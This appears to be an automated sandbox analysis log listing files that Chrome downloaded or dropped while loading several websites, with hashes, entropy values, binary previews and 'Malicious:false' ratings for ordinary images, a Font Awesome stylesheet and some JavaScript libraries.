                                              Preview:.PNG........IHDR...d...d.....G<ef...JPLTE..............K.............................=96....................................;..HA?@............~......5@................X.....E.....T..............7..............ZWX*'(..o-...#,MJJ.....a.........F5...Y6R]..........}u...cm...hff.Pd.....|'wur.....B"<HEak...vd....\M.....o|Zr}..?1DM..m....|j1..../8...K...an.LQ..^+..Tb'....IDATh.Wk{.J..@p@c0@..j.1..b...j..Oj4.....I>.....1=..^.Q..../kvPZ;..s+..Oi.v.[.....8....5..W0._.K.1....x2....s..U..Xaj..3..z.+r....>..X.>M...T.8........t.r-T..7...1/...6|...E.l...W|....w.]...H9....."A.iA....\..1<...}.]a}...v.........."0.a...[...}.{....H.v.|..,.K...C.1hp....]an....49...O..v.'.Hl.F.m.9...$1./.0.(..i1..A..L..A.;.K...N.M+.#..T...K.q)........q...y..pe...<...l(M...... %...@^.....=;............b.8...#).UU!E.......w.B:Tb.T..s..^...J..i5O......t1.?......1........!|Vg.f9l.h-.x>..a'@.q...h|z|<..Cp`...y.....8T9........a]L.k...../O.Gk,..:...DK;....,.t]k.Q.."2n.%...~........
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):6064
                                              Entropy (8bit):7.202838326829713
                                              Encrypted:false
                                              SSDEEP:96:nRBf33PRsfh303KwnbYlNY54glWxDYnS3hkA6UhrqWVgskzs1YxcbwadujDu9lka:RBigX6px8nSRkjebgN/xELI4P
                                              MD5:549D0830DA4A9DC0E04608256EEDB6F9
                                              SHA1:7EADCC0EA7C47A6CEB6AADBA68E335FA24CD42A9
                                              SHA-256:D12AC1B6F0BA3FF4C62816B4EAE02BD6FDC19D121DCE9D0197B63303C8D088BC
                                              SHA-512:12B7F5D3CF982108F49F646759BF159883B530A2212E56AED2D14CD771B3D893C161B4742A7735B8E81FE23A40BD76FE3FC66080F59FEB43A39C3142F5B458DD
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR..............$.....sBIT.....O.....pHYs.........B(.x....tEXtSoftware.www.inkscape.org..<.....PLTE.....d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..dx......tRNS................................ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUXZ[\]^_`abcdfhijklmnopqrstuvxyz{|}~...............
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (53030)
                                              Category:downloaded
                                              Size (bytes):54308
                                              Entropy (8bit):5.731647926760164
                                              Encrypted:false
                                              SSDEEP:768:jqjtNP5aMOM8HX5i7tTbrMzzOb/4Ss5BRvO7LKvadUDjFpMNYzvae2wHJowr1H:jetV5aMVKX5AtjX/GFvO6vStwWwrF
                                              MD5:F9FDA7AE47BD6EEB2E8C6A2D4EBFB68A
                                              SHA1:F1F799BF28C4FD2939B9D224507514B79554ECAE
                                              SHA-256:299F6A05FBF616F8FCFBEB611778E4AEA9A31485F0C557E8746CB9C2FADC8AB4
                                              SHA-512:BB965DCC501F66A95480325799DEEC7DE1CD3900269925E5D8ED1D11F209E038CC7AD9E146C48129672151A0B81CA83880CA8F790A67D0C2C4337004F071D663
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.google.com/js/th/KZ9qBfv2Fvj8--thF3jkrqmjFIXwxVfodGy5wvrcirQ.js
                                              Preview://# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjogMywic291cmNlcyI6WyIiXSwic291cmNlc0NvbnRlbnQiOlsiICJdLCJuYW1lcyI6WyJjbG9zdXJlRHluYW1pY0J1dHRvbiJdLCJtYXBwaW5ncyI6IkFBQUE7QUFBQTtBQUFBO0FBQUE7QUFBQTtBQUFBO0FBQUEifQ==.(function(){function D(W){return W}var S=function(W){return D.call(this,W)},T=this||self,a=function(W,r,P,Q,p,R,X,g,d,E,M,H){for(H=(E=9,P);;)try{if(E==52)break;else if(E==W)H=P,E=8;else if(E==62)E=d&&d.createPolicy?Q:36;else{if(E==36)return g;if(E==13)return H=P,g;E==Q?(H=52,g=d.createPolicy(p,{createHTML:S,createScript:S,createScriptURL:S}),E=13):E==9?(g=R,d=T.trustedTypes,E=62):E==8?E=T.console?r:13:E==r&&(T.console[X](M.message),E=13)}}catch(y){if(H==P)throw y;H==52&&(M=y,E=W)}};(0,eval)(function(W,r){return(r=a(26,16,69,19,"ad",null,"error"))&&W.eval(r.createScript("1"))===1?function(P){return r.createScript(P)}:function(P){return""+P}}(T)(Array(Math.random()*7824|0).join("\n")+['//# sourceMappingURL=data:application/json;charset=utf-8;base6
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):16841
                                              Entropy (8bit):7.738374181546845
                                              Encrypted:false
                                              SSDEEP:384:4YNg7Fey1aAazPcjRQvOodVEPIHG8oqGbVLoWEGHL:4YyXazAjRfPIHG8tq9oWXr
                                              MD5:D61BB9D44A345EDADD1BBE4241B23318
                                              SHA1:C316691BD15D74A25C2F09C6A2B9426C27BE9175
                                              SHA-256:FBA700A2320D5A99DE292B89D03A8C1117E6462AD567310EABC134173FF435DD
                                              SHA-512:52F010131C0DCE91C059870C5D30B2CBB9BC0EDE21C41CE28EA26B427842E72E623463A4351806A46F81F1398749F2C8253AB582287622C34B00DF945338F7AF
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):18346
                                              Entropy (8bit):7.9841770820037485
                                              Encrypted:false
                                              SSDEEP:384:ogn0QmouLgTckC3YQNzqOE6eDMDKOtV/IkpzaaGxXwL:l01o1TckizqhKDPtl5pzadxW
                                              MD5:4F08CC6A77E30C1868DBE1758CEB7121
                                              SHA1:CCABC3B9B290167CED5CD6931465FF0F8B83AD00
                                              SHA-256:9E5B7AF5C744477E0889AE7C4B0D48DE6B4232C74D0F5ACBB6B6F692A0707558
                                              SHA-512:2BD073B10D3EDE93FE1C1AA6F7ED314D315B048477BA70EF3CEA8BB925F43FE2292145E19ABCF6FFC624AC28EAC2BF8537F703DD576A6144BC152097BEEF988F
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF.G..WEBPVP8L.G../..?.'.8.mUy.}..C.....,{..o..4.G..*.....<.2%...[.V...m[U.|.8.%..0.P..h....g...2.R .R .nA...1..)a..". $.d...!9dG$@#d.`...F...10I...n.7......%M.2V..<."N...$QQ8HU.&I.R..0V........!$@...M.....Q..._P.H...}8Y )....[\..+.R.Rj.x...&.&nE.u.lG.:..q.K3R.$.(}.....<)yQ.$..6...-WF.._...|5.AuMV.A.ba.E-.X..B4..........y. :@.&.....*.-.~...~.o.....R.R.. ...U..+Z?..@.L.v..9d..2hE...ds..v].../._aY.\...D....8...v..V~...Ox...e..)....$.........n.v.B.P............:.l.v.$9..,^...@......\|.>../..n1.W}....h.J.JW.6.^y.( ......5.r|keu.(S .j...M.."#A...6...........G...N ).H.Z:._~..l._.~.@ .........).......}....1O0.dR)S/..$..F.`v...2G....Xw..f........t.......E./..........=;..+..k.#..Q/.1.q'k...3..36d#..#Y.......w......q....._.C`...}.........}.*T..a..";nv.......`p*...#..8c.\..n]..3%....G\<.......|<...4<c.....O.x..^`y..N...8AD.E...*."Ty..+..~....../.~..Ki.@..0?..'x...;.A:$-...+;..h....@.).wy.I..2..n...*B..PFx.w[....@...O.rH..K.....O...p.r.......j@.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):70462
                                              Entropy (8bit):7.996896661598661
                                              Encrypted:true
                                              SSDEEP:1536:BiRQVuy0uBpZkmb5RFGFkzqzQ3169hX0cprb1TTFUFi1vhHc/N:BajO+5k3gzEchb8FiHSN
                                              MD5:231DC1227756A2787C291DE830A9327E
                                              SHA1:9F986B9E280BCCCA36E0D36DEB7EF5B7D7F7323A
                                              SHA-256:0D7E5EB7147DB217C4448E9D57403BC27C953FAAB3FB677516870975CF4D9904
                                              SHA-512:3F237D3F5B4BFBDE353B65EFC39323E9E980936B9249CB3ACFBE7992D23BD79D1A7CD1F28E2DD27096604D4DDA4E951B78B86C8E03B8380A9FC5FF887B2FD632
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF6...WEBPVP8X..............VP8 .........*....>.n.R)&)....9...cK.r....jb.[x.q.k.{....).|'.......m............_........i>........A...{..W.....<...yC.O.............?.^..................~...).G...z..._.........._.J..V.w.).o...>..j...7.s.......L.......Y.H...E..F.j...U=..(,...Xs......+xs.I..V....3..e.1KI....pOb93.(...j......4S.....(..s....J...@.>..U.n...%.Vn.rk.S....."*w.].....X.......8..P..^=.b: ....".d.p7b.06.S.\,K...fZ...,.....$^1..x.H....'.....mWK-..q~.........e.?v...kx#..P.n:m&.b......=.e.S.?......H...&..7....V.n.."...~..,......|.^./.d.S?....L.../.IA..(X.c...f.Z}H....5.#..m.l........P...mF?....|....@7.@......[U.........{9.-...W..y.W.L....G.~. 2....EN..S..H..Z.s......[;...P..$.}3.vVg7..{L....@%.-...,..2C.w.g.J`..tA.!.#J./......h@tM5oTe..ihy...?h.K].K.......?."..r06......G.PK..W~.'...W....7..l...B..A?...ox. a..L;...[.b......k+......F....kM...fE.<..Qp,(.Rs..&.p2].6...z.F.........y.?\.%?.x&Q.......~..'.~V.`$.......-..a.. z..&6w...,|>.#y.f...g8.C...Ng.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):3134
                                              Entropy (8bit):7.932761736204711
                                              Encrypted:false
                                              SSDEEP:48:YV81iRSSGsFuUDHDVzKjN6fp429rabvBjgDv3hO8+RAeRKGphlV9D7fLDLa:YsiZSGHgyp429aDVgLZOlRKYnDXa
                                              MD5:FCB6A0EAB85B9D49850002D959F2BB7B
                                              SHA1:D17ECB5ACD09D2792ECCA15E856085BCC0AD332C
                                              SHA-256:EAF3147E0C525C2D29E9E1FE84296282F38E72F5A55792092D2A13E6730C0D6E
                                              SHA-512:18093D53107F6D58D38973CE93EDFAF7CD6AEA0A852C4EE1798E9687410D0AC7B8F4FF7C0DD7D784DB3A799BC080CF1AA93029E2F9701E8F32F527295D48CACD
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTEy..@Q.......\k....8H.AP. ........=N....w.........v........|.&..&..|.......1?....v...m.......@E.JZ.3.....z..?N.......w..o....`j....=H.an.Fu....)Z.f..K....-9............TIDATh...z....9.@@@N"...OU......&`..}...Am.$o..d.Z...d._3Y.q...}y..~X.K.~.^.......Em.Ln.}.o..Cs.=g9.'.|.Mk........|.9...U.}..j.._+`*%...u.&.}...m........+c".`,w...ax0.U...b......Pk...|._.....}..4...?..n..d.i@D.eF..~...g.A.?.p....?a.A1T.n..Y.'K......X...2V..e.Df_.A(.+QU...U.....%o2xn.Y...w3Q.+... ..Az%....P...R.(*.(.o..=Dm..B...C~&%.....E...-.%R.=./J.b..+,..q)..A.. ._.4,l*...OV*Y.......lW..V...GLJ..A.. ..._ .J.:D!..%..L.&d....EI;d..$g_a...7".l.U..._b.)....L...2..?BB....c....(.[....~16#...u^WB...,.....(....9... ..p..K}....l...J.l(.}$W..r...-.|.7!..K.`..FY|.........}aI.).....d... .s..Z:!.E.1.j..xP..../..[......W...e.<Rr..?.Dx..B......l..w...{..3.}N...~A...1.`#.[ .x.>6......U......w.@..`....=.%&..hs.2/..5..R/..Q....B..n..<.^.T@pJ..T.....X.. .|...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):30734
                                              Entropy (8bit):7.992755812557774
                                              Encrypted:true
                                              SSDEEP:768:IvIeMVZJIohs5TXfPZ1sLjPxAvXq99Z7GNqyoyYlvVJvTjxOT:yost1s/ZAyr7e7oywfxOT
                                              MD5:40DC9F5FD69BCB0BC66D08EA9F49403D
                                              SHA1:6725019A2C27F3D53DBCE6021153EAD92A171BFA
                                              SHA-256:8C66BDD1EAEA647F98F67B3CCF15B95327389C0CCCE9215D09850994154E615D
                                              SHA-512:3812142ECF4DC72D35CBC0561248566FA213835A687345C69114ED6A3753F17D357CC4210DF496ED7F8875FA30BB75AC18605CB4FE0B69A3184107365163BA00
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF.x..WEBPVP8X..............VP8 .w..p....*.......%..l..].........w.i.w.}X.o...?..o........n....?.g._....S..........].-.K.G.?..........................e.....O.........b.7.G.w.w.O.......Q.....W.......>.......9...+.../._.O..................'.w.../k....}@7#......_.?..a.W..._.?.........w..........j...........?w?..c.g...?..............O............O./ M....?.w..@.......?.....k...o......?........9.......?...>..y...;.........W......._......i.......?..................=.....O._........;.........>..n.....U..~f~......V...>..R.....-.v/f.b....-o.!.L.....3.b......WW.......#.L.9..h./-...F.f.J_..>.}."1.2"..M..='.......CX...}.9..(...Tl.H.h>;.W......_...}^.!.......0U.C.F.CL.,e....M...ik...:..S....~......p...d..Z..:M..3`g..).%d.......fW..,?`G....d.!..-...*.ge.LK.H.-.......2.f.=[.h8m...Z.D....Sh.d...~..v.(R...3CWH..i..x.O6.......N".m.g.+..o..d..7..?....S....q.s..(..l....P..........Op.v......X_.............RW..............".}He J.j.g...9}...7.R.....K..&.\..~.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 2546 x 672, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):62869
                                              Entropy (8bit):7.8165276002069835
                                              Encrypted:false
                                              SSDEEP:1536:vm9IDHy7NUqc00qPUgIiXQWsHYDBedU0yE:vmUuNUqfhPUVmQ0ledWE
                                              MD5:17944A0BC5F6256E19BCA5198FC5BC1E
                                              SHA1:6E98F2ED579EDE99C4084F60F62F5AD6DACC7ACA
                                              SHA-256:D226870C6677CE7034DE280F39C4A8E6CF68C0614412473F9167AFDFA9F921B2
                                              SHA-512:3BBAC5EE646921E200ED096ABBDBC15E02E7B89DD9AE3D3F88BB27B3EB7D664B6DD811E01113CA7A78158A1BD9A7535F806E8921CB1B3D72559F2A4F00927454
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/logo.png
                                              Preview:.PNG........IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<...BiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.1462899777, 2023/06/25-23:57:14 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 25.2 (20231101.m.2385 38bb2d3) (Windows)" xmpMM:InstanceID="xmp.iid:EE0DF744805E11EE9FA9A77BE8015A05" xmpMM:DocumentID="xmp.did:EE0DF745805E11EE9FA9A77BE8015A05"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:EE0DF742805E11EE9FA9A77BE8015A05" stRef:documentID="xmp.did:EE0DF743805E11EE9FA9A77BE8015A05"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>K.......IDATx.....%U.8.z.30.4d.."..."A.E0..VY.T.YED....F`....<.A..A2" ....i.5.a...**...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (52276)
                                              Category:downloaded
                                              Size (bytes):102217
                                              Entropy (8bit):4.7821044831117785
                                              Encrypted:false
                                              SSDEEP:1536:0wMCMPMCMjMCM4MCMwMCM3sVMX709gbPMfjSFOTyPGuuprrlCq:M709gMGFiyPGuuprlCq
                                              MD5:5222E06B77A1692FA2520A219840E6BE
                                              SHA1:8B4236206A8B86AF3761A244277663046D7FF7EE
                                              SHA-256:0934B1FC0D3A766D41D3ADF5E7A115875E66E98EBBA408D965A41CF3D2CB4AB5
                                              SHA-512:CF780BA5DEF29277F562835B0B3A9129CE2ACA8AFC81A294D6A9A7F824A1C5BB81BAC00D23D42946884606B7821642B12E17A2E92F424171446DB2AEA8B8340C
                                              Malicious:false
                                              Reputation:low
                                              URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.2/css/all.min.css
                                              Preview:/*!. * Font Awesome Free 6.4.2 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2023 Fonticons, Inc.. */..fa{font-family:var(--fa-style-family,"Font Awesome 6 Free");font-weight:var(--fa-style,900)}.fa,.fa-brands,.fa-classic,.fa-regular,.fa-sharp,.fa-solid,.fab,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-classic,.fa-regular,.fa-solid,.far,.fas{font-family:"Font Awesome 6 Free"}.fa-brands,.fab{font-family:"Font Awesome 6 Brands"}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-2xs{font-size:.625em;line-height:.1em;vertical-align:.225em}.fa-xs{font-size:.75em;line-
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):7485
                                              Entropy (8bit):7.927313291848507
                                              Encrypted:false
                                              SSDEEP:192:CPlEnWIDHcmsaaKt42PR5cZfatX/vPB1uz:CUcXbsXcZytvvPB1uz
                                              MD5:7007AAADE16947162124A94AF9927682
                                              SHA1:3C64052CAB109443A4822E60E45547B7B1E531A2
                                              SHA-256:CC4382FA7041AA160C4899A070EB161B17F0852276F7C890B6CB023E283B28A5
                                              SHA-512:F64CE3DB9AE1BC0CEC881928CA41234AE7CFCBE1848CEC9C4A1E5C6E2B2B79FCD09444015737CCC580DC8B9129B61E4FCDE4ABD2301D104780540DF231D7D512
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR.......P......N......tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.da4a7e5ef, 2022/11/22-13:50:07 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:6574AC7DD9DC11EDB0EAEA16EBC1DDF2" xmpMM:DocumentID="xmp.did:6574AC7ED9DC11EDB0EAEA16EBC1DDF2"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6574AC7BD9DC11EDB0EAEA16EBC1DDF2" stRef:documentID="xmp.did:6574AC7CD9DC11EDB0EAEA16EBC1DDF2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.I......IDATx..].t../y/....$.v. A@...X.E...V.J..G...L..x..{...hG+`+`.m..A.RQP.Q....e#d...K.....w..?.mY`..w.>...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):119988
                                              Entropy (8bit):7.998429760817896
                                              Encrypted:true
                                              SSDEEP:3072:387uw4eDgp4lfR1tR1Gd4MV+kIEFtrtPxAazH6qUzf5kH:387uheuQfR1tREWMVBZXtPtzaqGf2H
                                              MD5:50B5E2D5FCEED2645D29D9E1B4FEAE25
                                              SHA1:BA5CE9299E8CB02F5D4E5C78EBC14AAD5021C825
                                              SHA-256:77D9018BF5A161BBACC82EBADDB8F35F9257C6EF29A1F263086E0CC7A795E432
                                              SHA-512:819A075E8E222D5081C734C4BEEE5559481D907A748A6B48AACC6EF9B8C835B25576CAC810AF0DC077C968C839FA0103B1FD748BA830CDB0CE5A58D8371905B3
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF....WEBPVP8X..............VP8 8..../...*....>.d.P)%24.S,...dn-.^.`....qb..9[..........T.%.nv.A.3.OX.8..z<.P.G.7g........._.>..?U_.xK._...:..c.'..]?......................w=..U.......c....[O[/........_.......?.....~._.>...=.:....G...{......._..MS~..G.?..6~....O.w...~....Z.._...|..........~e...D.?..`....?y.........7.ob_.............X.R*....#0]+.+..:=,...wk...|.....B.p.5U[D.....+..9s.............R...[.x0....(h.q...x..N.C{.X2<Wy.........:gn<..L..........~..o.h.@......! \=f..G...vDQ...y..5.f.c......O.....LN#.......==+......t#.fV..[yf..m.rY....*#.2..33..N.....5........I3=6..!o@D..+).....,vA..Mg1.d.>:sp.....MW.....9)..=.'.9.....V.E@...$Rd...k........Q...u.p$6.)...Z".."..m...]@nwO..p\.1. (vS...S.>.)...........>.....B......(.F.i..V..$.@v.."..L;...zU...,. W..FY`.L...*...#./....t....wDq...CR....s....i.@...-.C.r.._]).]x..D.rpnVO0(.~.... r...>.ep....5."5..-y..~..y|.Q.....P.r.V.,.Y..QT4...;./^......|.i$....,..r'..5.[......5.s...D..6...`..LTR...V.h..T.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):13355
                                              Entropy (8bit):7.617070955659662
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwLSHNX8WLwO1MY3LR3XhHRUqxtbzBFpvGlf9RwL3zJLRudDHMn6E1:4YNg7LdWhMeFnxfPp+ZSDJLRgDI6E1
                                              MD5:F337F3B67E73029739AF057838D2CCCA
                                              SHA1:D55059F491CEA5A9244557D1C51792012F9946DB
                                              SHA-256:7982BCCD84264238181AFDC79B2951EF48D40BD6502F21088EF21FE981E1FF9A
                                              SHA-512:742D0011346DBE6489837FA8EA34564ED52BCF101B4ABC53E659F452500F1FD0DC1889FC535F3003A00A7C57CB3DE33F3540B1707E623D7F959D80EA5223F9D2
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (3582)
                                              Category:downloaded
                                              Size (bytes):3890
                                              Entropy (8bit):5.292693512327714
                                              Encrypted:false
                                              SSDEEP:96:Dhjp3a6t/KH/QBZdpFVSZgZ/uf6vBd6FF9v6GVMi0R5qIf1Q:1fFjpO+Z2SpdAvMi4Lf1Q
                                              MD5:42B8DA51F26F0347A2C840F04EE7E72B
                                              SHA1:F0CA0BE7EFD92CD5FA83C1A65DA0A4D49F5314C6
                                              SHA-256:15A443E415F3FC7B5D9D647C98200F16A47F9EC611AD276BEC5670B169AA4F23
                                              SHA-512:94551D9C83F454761AB6AB4AD0C9E2D920C14BAD89B5450FABD176E9AFD20CF64C1E81A9DC4D563BD8075EED4375D68DD628357E7E26BC702A278C7491AB8A43
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/js/ScrollToPlugin.min.js
                                              Preview:/*!. * ScrollToPlugin 3.11.1. * https://greensock.com. * . * @license Copyright 2022, GreenSock. All rights reserved.. * Subject to the terms at https://greensock.com/standard-license or for Club GreenSock members, the agreement issued with that membership.. * @author: Jack Doyle, jack@greensock.com. */..!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?t(exports):"function"==typeof define&&define.amd?define(["exports"],t):t((e=e||self).window=e.window||{})}(this,function(e){"use strict";function k(){return"undefined"!=typeof window}function l(){return u||k()&&(u=window.gsap)&&u.registerPlugin&&u}function m(e){return"string"==typeof e}function n(e){return"function"==typeof e}function o(e,t){var o="x"===t?"Width":"Height",n="scroll"+o,r="client"+o;return e===T||e===i||e===c?Math.max(i[n],c[n])-(T["inner"+o]||i[r]||c[r]):e[n]-e["offset"+o]}function p(e,t){var o="scroll"+("x"===t?"Left":"Top");return e===T&&(null!=e.pageXOffset?o="page"+t.toUpperCase()+"Offset":e=null!=i
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):9941
                                              Entropy (8bit):7.428805450862958
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwarb7XSqRpN1M35LdOIyA4fuXuyiy2:4YNg7arbLSgpN1MxsI5+yg
                                              MD5:8EA412BF2F67B0E50952495478C36E11
                                              SHA1:EA6F54ECE605DBBC1C55018D7D4A3670B5E8DF5E
                                              SHA-256:485BD9E95EC5E81D7D5543C4977AF97D40F2C3337B6B468F6B320007934E7077
                                              SHA-512:55870194658131C3534DDEA4C1C5ECD82D696281A6BCE18FBDC89F44BADB52ADE6140329E4BA28D56BC0DEC4135CE1F2A89008010B675EAE949185524ACF7D50
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/44/acee060d0c6435e0652790178335b962.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):5465
                                              Entropy (8bit):7.959560867675525
                                              Encrypted:false
                                              SSDEEP:96:ByUTcWHi7jbqByrvrucu959SFTuyPNPBeRQ7EQ7:ByogqUPucu95cFTuyPZBEG7
                                              MD5:40508BA2AE1FC521D1AE77983CAD08E8
                                              SHA1:208674A2D64CFC37358EEEEF5D69ADB5ABF9A345
                                              SHA-256:81677FC9510D96F16AE7DB99B430232F8C89C54DE01D8E7B6D8E42381E58A1AA
